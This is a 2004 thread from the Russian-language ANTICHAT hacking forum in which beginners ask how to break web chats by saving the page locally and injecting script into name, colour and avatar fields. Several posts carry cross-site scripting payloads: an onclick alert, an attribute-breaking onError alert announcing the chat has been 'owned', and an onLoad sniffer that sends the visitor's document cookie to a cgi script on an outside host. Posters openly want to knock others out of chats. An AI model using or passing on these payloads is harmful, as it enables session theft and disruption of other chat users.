ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 12.08.2004, 00:11
Guest
Провел на форуме:

а с помощью этих доков я могу когонить из чата выкинуть??????

Старый 16.08.2004, 02:22
HOBBIT
Новичок
Провел на форуме:
0

Я всё хочу научиться ломать чаты при помощи сохранения их на диск. Я кой-как разбираюсь в html и java, но всё равно чё то не догнать мне некоторых деталей.

Старый 16.08.2004, 02:28
~Ice_night_BeTeP~
Участник форума
Провел на форуме:
0

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Хакер @ июля 20 2004,22:50)</td></tr><tr><td id="QUOTE">Народ кто хорошо разбирается в компах и хакинге помогите точнее научите работать с чатом с диска пишите на асю или на почту можите даже оставлять сообщения в форуме кто не знает тот не отвечает ХОРОШО?
Зарание спасибо мыло моё Schumi7@mail.ru[/QUOTE]<span id='postcolor'>
я могу научить

Старый 16.08.2004, 05:36
HOBBIT
Новичок
Провел на форуме:
0

Кто-нить объясните. Я сохранил страницу на харде и вроде внёс все нужные изменения в html. Ввёл символы &quot;=&amp; и т.п. в поле имя и цвет, на чат зашёл без проблем. Но. Куда нужно вставлять например вот этот скрипт &lt;font onclick=&quot;javascript:alert()&quot;&gt;Text&lt;/font&gt;? Его надо вставлять в html страницы или прямо в поле ввода сообщения? Или ещё куда-нить?

Старый 16.08.2004, 17:11
Guest
Провел на форуме:

народ вот взлом через лицо типа печатаешь сообшение а у всех вылазит ошибка &quot;чат поимели&quot;. вот мне там типан сказал...засунь это &quot; onError=&quot;alert(/ Чат поимели /)&quot; z=&quot;
а у меня один хрен не канает что можно ещё туда зпихнуть ???? (имею ввиду в поля для рожи )

Старый 17.08.2004, 05:58
Morph
Постоянный
Провел на форуме:
1770063

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Кто-нить объясните. Я сохранил страницу на харде и вроде внёс все нужные изменения в html. Ввёл символы &quot;=&amp; и т.п. в поле имя и цвет, на чат зашёл без проблем. Но. Куда нужно вставлять например вот этот скрипт &lt;font onclick=&quot;javascript:alert()&quot;&gt;Text&lt;/font&gt;? Его надо вставлять в html страницы или прямо в поле ввода сообщения? &nbsp; &nbsp;Или ещё куда-нить? &nbsp; [/QUOTE]<span id='postcolor'>
У меня тож такаяже проблема,ну вы там больно не смейтесь мы веть тока начинающие хакеры.
Подскажите плиз

Старый 17.08.2004, 21:47
Guest
Провел на форуме:

TO: zFailure
слушай с мессагой канает а вот со снифером не как ведь там поле для лица и всё а твой пример стоит после 1.gif&quot;
и в поле соответчтвенно что то впишеш но толь ко до 1.gif&quot;
а куда писать &nbsp;onLoad=&quot;x=new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+d....cookie;&quot; z=&quot;

Ответ